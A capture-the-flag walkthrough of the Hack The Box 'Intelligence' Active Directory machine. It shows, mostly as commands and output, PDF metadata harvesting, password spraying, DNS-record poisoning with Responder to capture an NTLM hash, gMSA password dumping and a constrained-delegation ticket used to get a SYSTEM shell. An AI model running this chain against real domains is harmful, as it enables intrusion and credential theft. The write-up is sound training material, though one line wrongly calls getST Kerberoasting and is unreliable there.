Intelligence

Nmap scan

kali@kali  ~/HTB/intelligence/intelligence2 
▶  nmap -sV -sC -oA intelligence  $IP -Pn        
Starting Nmap 7.94 ( https://nmap.org ) at 2023-10-02 06:43 EDT
Nmap scan report for intelligence.htb (10.10.10.248)
Host is up (0.28s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
80/tcp   open  http          Microsoft IIS httpd 10.0
|_http-title: Intelligence
|_http-server-header: Microsoft-IIS/10.0
| http-methods: 
|_  Potentially risky methods: TRACE
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-10-02 17:44:11Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:36+00:00; +7h00m06s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:35+00:00; +7h00m06s from scanner time.
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
|_ssl-date: 2023-10-02T17:45:36+00:00; +7h00m06s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: intelligence.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-10-02T17:45:35+00:00; +7h00m06s from scanner time.
| ssl-cert: Subject: commonName=dc.intelligence.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.intelligence.htb
| Not valid before: 2021-04-19T00:43:16
|_Not valid after:  2022-04-19T00:43:16
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2023-10-02T17:44:55
|_  start_date: N/A
|_clock-skew: mean: 7h00m05s, deviation: 0s, median: 7h00m05s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 108.66 seconds
 kali@kali  ~/HTB/intelligence/intelligence2 

Check port 80 as a low hanging fruit – Potential foothold

Looking around there is a link to download document — http://10.10.10.248/documents/2020-01-01-upload.pdf

Download the document and check exif information

 kali@kali  ~/HTB/intelligence/intelligence2 
▶  ls
2020-01-01-upload.pdf  intelligence.gnmap  intelligence.nmap  intelligence.xml
 kali@kali  ~/HTB/intelligence/intelligence2 
▶  exiftool 2020-01-01-upload.pdf
ExifTool Version Number         : 12.65
File Name                       : 2020-01-01-upload.pdf
Directory                       : .
File Size                       : 27 kB
File Modification Date/Time     : 2021:04:01 13:00:00-04:00
File Access Date/Time           : 2023:10:02 06:52:39-04:00
File Inode Change Date/Time     : 2023:10:02 06:52:39-04:00
File Permissions                : -rw-r--r--
File Type                       : PDF
File Type Extension             : pdf
MIME Type                       : application/pdf
PDF Version                     : 1.5
Linearized                      : No
Page Count                      : 1
Creator                         : William.Lee
 kali@kali  ~/HTB/intelligence/intelligence2 

We see there is a user called William.Lee

We enumerate the link by changing the date and we can see there is other documents such as http://10.10.10.248/documents/2020-01-02-upload.pdf

used the following script to download the files for the year

#!/bin/bash

base_url="http://10.10.10.248/documents"
year=2020

for month in $(seq -w 1 12); do
    case $month in
        01|03|05|07|08|10|12) days=31;;
        04|06|09|11) days=30;;
        02)
            # For 2020, which is a leap year
            days=29
            ;;
    esac

    for day in $(seq -w 1 $days); do
        url="${base_url}/${year}-${month}-${day}-upload.pdf"
        
        # Check if file exists without downloading it
        if wget --spider -q $url 2>/dev/null; then
            wget $url  # Only download if the file exists
        fi
    done
done

 kali@kali  ~/HTB/intelligence 

running the script to download all the files into a new pdf folder

 kali@kali  ~/HTB/intelligence 
▶  cd intelligence2/pdf                                    
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  ls
download_pdfs.sh
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  ./download_pdfs.sh 

pdf folder

▶  ls
2020-01-01-upload.pdf  2020-05-20-upload.pdf  2020-09-04-upload.pdf
2020-01-02-upload.pdf  2020-05-21-upload.pdf  2020-09-05-upload.pdf
2020-01-04-upload.pdf  2020-05-24-upload.pdf  2020-09-06-upload.pdf
2020-01-10-upload.pdf  2020-05-29-upload.pdf  2020-09-11-upload.pdf
2020-01-20-upload.pdf  2020-06-02-upload.pdf  2020-09-13-upload.pdf
2020-01-22-upload.pdf  2020-06-03-upload.pdf  2020-09-16-upload.pdf
2020-01-23-upload.pdf  2020-06-04-upload.pdf  2020-09-22-upload.pdf
ching 2020-01-25-upload.pdf  2020-06-07-upload.pdf  2020-09-27-upload.pdf
2020-01-30-upload.pdf  2020-06-08-upload.pdf  2020-09-29-upload.pdf

script to extract all the "creator" field from all the pdfs and send them to a users.txt file

▶  cat exif.sh         
#!/bin/bash

# Directory containing the PDF files
dir="."

# Iterate over all PDF files in the directory
for pdf in "$dir"/*.pdf; do
    # Extract the 'Creator' field using exiftool
    creator=$(exiftool -Creator "$pdf" | awk -F': ' '{print $2}')
    if [ ! -z "$creator" ]; then  # Check if the 'Creator' field is not empty
        echo "$creator" >> users.txt
    fi
done

▶  ./exif.sh         
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  less users.txt 
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  more users.txt   
William.Lee
Scott.Scott
Jason.Wright
Veronica.Patel

We combine all the pdfs to a single txt file so we can search for a word like password. we use pdftotext

 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  for pdf in *.pdf; do
    pdftotext "$pdf" - >> combined.txt
done

 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  

Searching for the word password in this file and show line before and after

▶  grep -B 1 -A 1 "password" combined.txt

Welcome to Intelligence Corp!
Please login using your username and the default password of:
NewIntelligenceCorpUser9876
After logging in please change your password as soon as possible.

 kali@kali  ~/HTB/intelligence/intelligence2/pdf 

we get the password – NewIntelligenceCorpUser9876

we check the password against all the userss using crackmapexec


 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  crackmapexec smb 10.10.10.248 -u users.txt -p NewIntelligenceCorpUser9876  
SMB         10.10.10.248    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:intelligence.htb) (signing:True) (SMBv1:False)
SMB         10.10.10.248    445    DC               [-] intelligence.htb\William.Lee:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 

it gets valid login for the last login tiffany.molina

SMB         10.10.10.248    445    DC               [-] intelligence.htb\Richard.Williams:NewIntelligenceCorpUser9876 STATUS_LOGON_FAILURE 
SMB         10.10.10.248    445    DC               [+] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

We check with crackmapexec if we can pawn but no luck

▶  crackmapexec winrm 10.10.10.248 -u Tiffany.Molina -p NewIntelligenceCorpUser9876
SMB         10.10.10.248    5985   DC               [*] Windows 10.0 Build 17763 (name:DC) (domain:intelligence.htb)
HTTP        10.10.10.248    5985   DC               [*] http://10.10.10.248:5985/wsman
WINRM       10.10.10.248    5985   DC               [-] intelligence.htb\Tiffany.Molina:NewIntelligenceCorpUser9876

we check the shares

SMB         10.10.10.248    445    DC               ADMIN$                          Remote Admin
SMB         10.10.10.248    445    DC               C$                              Default share
SMB         10.10.10.248    445    DC               IPC$            READ            Remote IPC
SMB         10.10.10.248    445    DC               IT              READ            
SMB         10.10.10.248    445    DC               NETLOGON        READ            Logon server share 
SMB         10.10.10.248    445    DC               SYSVOL          READ            Logon server share 
SMB         10.10.10.248    445    DC               Users           READ   

we have access to users

connecting to the users share

▶  smbclient \\\\10.10.10.248\\users -U tiffany.molina%NewIntelligenceCorpUser9876
Try "help" to get a list of possible commands.
smb: \> ls
  .                                  DR        0  Sun Apr 18 21:20:26 2021
  ..                                 DR        0  Sun Apr 18 21:20:26 2021
  Administrator                       D        0  Sun Apr 18 20:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 03:21:46 2018
  Default                           DHR        0  Sun Apr 18 22:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 03:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:11:27 2018
  Public                             DR        0  Sun Apr 18 20:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 21:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 20:51:46 2021

		3770367 blocks of size 4096. 1463758 blocks available
smb: \> 

we are able to get the user flag

smb: \> ls
  .                                  DR        0  Sun Apr 18 21:20:26 2021
  ..                                 DR        0  Sun Apr 18 21:20:26 2021
  Administrator                       D        0  Sun Apr 18 20:18:39 2021
  All Users                       DHSrn        0  Sat Sep 15 03:21:46 2018
  Default                           DHR        0  Sun Apr 18 22:17:40 2021
  Default User                    DHSrn        0  Sat Sep 15 03:21:46 2018
  desktop.ini                       AHS      174  Sat Sep 15 03:11:27 2018
  Public                             DR        0  Sun Apr 18 20:18:39 2021
  Ted.Graves                          D        0  Sun Apr 18 21:20:26 2021
  Tiffany.Molina                      D        0  Sun Apr 18 20:51:46 2021

		3770367 blocks of size 4096. 1463758 blocks available
smb: \> cd Tiffany.Mplina
cd \Tiffany.Mplina\: NT_STATUS_OBJECT_NAME_NOT_FOUND
smb: \> cd Tiffany.Molina
smb: \Tiffany.Molina\> ls

smb: \Tiffany.Molina\> cd Desktop
smb: \Tiffany.Molina\Desktop\> ls
  .                                  DR        0  Sun Apr 18 20:51:46 2021
  ..                                 DR        0  Sun Apr 18 20:51:46 2021
  user.txt                           AR       34  Mon Oct  2 13:42:29 2023
c
		3770367 blocks of size 4096. 1463758 blocks available
smb: \Tiffany.Molina\Desktop\> type user.txt
type: command not found
smb: \Tiffany.Molina\Desktop\> cat user.txt
cat: command not found
smb: \Tiffany.Molina\Desktop\> get user.txt
getting file \Tiffany.Molina\Desktop\user.txt of size 34 as user.txt (0.0 KiloBytes/sec) (average 0.0 KiloBytes/sec)
smb: \Tiffany.Molina\Desktop\> 

▶  cat user.txt  
9e0e4c1cdafbb30517b2ed66346a81cd
 kali@kali  ~/HTB/intelligence/intelligence2/pdf 
▶  

Tiffany also had access to the read share and we connect to it and get the .ps1 file in there

                                  D        0  Sun Apr 18 20:50:55 2021
  downdetector.ps1                    A     1046  Sun Apr 18 20:50:55 2021

		3770367 blocks of size 4096. 1463758 blocks available
smb: \> get downdetector.ps1 
getting file \downdetector.ps1 of size 1046 as downdetector.ps1 (0.9 KiloBytes/sec) (average 0.9 KiloBytes/sec)
smb: \> 

the file

Import-Module ActiveDirectory 
foreach($record in Get-ChildItem "AD:DC=intelligence.htb,CN=MicrosoftDNS,DC=DomainDnsZones,DC=intelligence,DC=htb" | Where-Object Name -like "web*")  {
try {
$request = Invoke-WebRequest -Uri "http://$($record.Name)" -UseDefaultCredentials
if(.StatusCode -ne 200) {
Send-MailMessage -From 'Ted Graves <[email protected]>' -To 'Ted Graves <[email protected]>' -Subject "Host: $($record.Name) is down"
}
} catch {}
}

after research fond that we can use dnstool and responder to capture information

We run responder

▶  sudo python Responder.py -I tun0 -i 10.10.14.21 -A


and run dnstool

▶  python dnstool.py -u 'intelligence.htb\Tiffany.Molina' -p NewIntelligenceCorpUser9876 -a add -r webfakedomain.intelligence.htb --data 10.10.14.21 10.10.10.248

[-] Connecting to host...
[-] Binding to host
[+] Bind OK
[-] Adding new record
[+] LDAP operation completed successfully
 kali@kali  ~/HTB/intelligence/krbrelayx   master 
▶  

We get a hash

Ted.Graves::intelligence:2291e74033392ca3:FF33E10D045B6E1A7C7C4B67B58C1384:010100000000000007043557BBF0D90172F47A5018A5B99D00000000020008005900500032004E0001001E00570049004E002D004D003500540036003600410031005000550059004700040014005900500032004E002E004C004F00430041004C0003003400570049004E002D004D0035005400360036004100310050005500590047002E005900500032004E002E004C004F00430041004C00050014005900500032004E002E004C004F00430041004C0008003000300000000000000000000000002000005C6E85BD47BB8677D646712E35A83DCDBAC1972A80DCFFA047D66D08463DAE000A001000000000000000000000000000000000000900460048005400540050002F00770065006200660061006B00650064006F006D00610069006E002E0069006E00740065006C006C006900670065006E00630065002E006800740062000000000000000000

send this to a file called ted

its an NTLM hash

Running this against hashcat

▶  cd /usr/bin       
 kali@kali  /usr/bin 
▶  sudo ./hashcat -m 5600 /home/kali/HTB/intelligence/ted /usr/share/wordlists/rockyou.txt

we run bloodhound to get the jsons that we can load to bloodhound


▶  bloodhound-python -u TED.GRAVES -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c all
▶  bloodhound-python -u TED.GRAVES -p 'Mr.Teddy' -ns 10.10.10.248 -d intelligence.htb -c all

INFO: Found AD domain: intelligence.htb
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: dc.intelligence.htb
INFO: Found 42 users
INFO: Found 54 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: svc_int.intelligence.htb
INFO: Querying computer: dc.intelligence.htb
WARNING: Could not resolve: svc_int.intelligence.htb: The resolution lifetime expired after 3.202 seconds: Server Do53:10.10.10.248@53 answered The DNS operation timed out.; Server Do53:10.10.10.248@53 answered The DNS operation timed out.

We start neo4j and load the jsons into bloodhound

Research — Ted.Graves is in the ITSupport group, which has ReadGMSAPassword on SVC_INT. Even more interestingly, if I use the pre-built query “Shortest Path from Owned Principles”, the svc_int account has AllowedToDelegate on the DC

There is a tool in https://github.com/micahvandeusen/gMSADumper

▶  wget https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
--2023-10-02 08:36:04--  https://raw.githubusercontent.com/micahvandeusen/gMSADumper/main/gMSADumper.py
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 185.199.110.133, 185.199.111.133, 185.199.108.133, ...
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.110.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 6287 (6.1K) [text/plain]
Saving to: ‘gMSADumper.py’

gMSADumper.py            100%[===============================>]   6.14K  --.-KB/s    in 0.001s  

2023-10-02 08:36:05 (6.33 MB/s) - ‘gMSADumper.py’ saved [6287/6287]

 kali@kali  ~/HTB/intelligence/intelligence2 
▶  

we run it with teds credentials

we get hash for svc_int account

▶  python gMSADumper.py -u Ted.Graves -p Mr.Teddy -l intelligence.htb -d intelligence.htb
Users or groups who can read password for svc_int$:
 > DC$
 > itsupport
svc_int$:::ff3418066942aa8bd228ea17dc71999a
svc_int$:aes256-cts-hmac-sha1-96:30844881b57965c3a115cafa00eb0935928ff0af889f3818e0bc1ccf50c0cbfb
svc_int$:aes128-cts-hmac-sha1-96:327f8f8594183dfe4f430986556147b2
 kali@kali  ~/HTB/intelligence/intelligence2 

we use getST.py –> In the context of the OSCP (Offensive Security Certified Professional) and similar penetration testing environments, GetST.py is a script commonly associated with the Kerberos attack vector called "Kerberoasting".

 kali@kali  ~/HTB/intelligence/intelligence2 
▶  locate getST.py
/usr/share/doc/python3-impacket/examples/getST.py
 kali@kali  ~/HTB/intelligence/intelligence2 
▶  cd /usr/share/doc/python3-impacket/examples/             
 kali@kali  /usr/share/doc/python3-impacket/examples 
▶  getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
zsh: command not found: getST.py
 ✘ kali@kali  /usr/share/doc/python3-impacket/examples 
▶  ./getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
 kali@kali  /usr/share/doc/python3-impacket/examples 

update NTP then retry

▶  /usr/share/doc/python3-impacket/examples/getST.py -dc-ip 10.10.10.248 -spn www/dc.intelligence.htb -hashes :ff3418066942aa8bd228ea17dc71999a -impersonate administrator intelligence.htb/svc_int
Impacket v0.11.0 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] 	Requesting S4U2self
[*] 	Requesting S4U2Proxy
[*] Saving ticket in administrator.ccache
 kali@kali  ~/HTB/intelligence/intelligence2 
▶  ls             
2020-01-01-upload.pdf  gMSADumper.py    intelligence.gnmap  intelligence.xml
administrator.ccache   gMSADumper.py.1  intelligence.nmap   pdf
 kali@kali  ~/HTB/intelligence/intelligence2 

we export the ticket


 kali@kali  ~/HTB/intelligence/intelligence2 
▶  export KRB5CCNAME=administrator.ccache 

using psexec

/usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass [email protected]@dc.intelligence.htb

▶  /usr/share/doc/python3-impacket/examples/psexec.py -k -no-pass [email protected]@dc.intelligence.htb

Impacket v0.11.0 - Copyright 2023 Fortra

[*] Requesting shares on dc.intelligence.htb.....
[*] Found writable share ADMIN$
[*] Uploading file fJuQdKmn.exe
[*] Opening SVCManager on dc.intelligence.htb.....
[*] Creating service pONO on dc.intelligence.htb.....
[*] Starting service pONO.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.17763.1879]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Windows\system32> whoami
nt authority\system

C:\Windows\system32> 

C:\Users\Administrator\Desktop> dir
 Volume in drive C has no label.
 Volume Serial Number is E3EF-EBBD

 Directory of C:\Users\Administrator\Desktop

04/18/2021  05:51 PM    <DIR>          .
04/18/2021  05:51 PM    <DIR>          ..
10/02/2023  10:42 AM                34 root.txt
               1 File(s)             34 bytes
               2 Dir(s)   5,988,077,568 bytes free

C:\Users\Administrator\Desktop> type root.txt
47db65fca4342911729f61bf4b7fe6c1

C:\Users\Administrator\Desktop>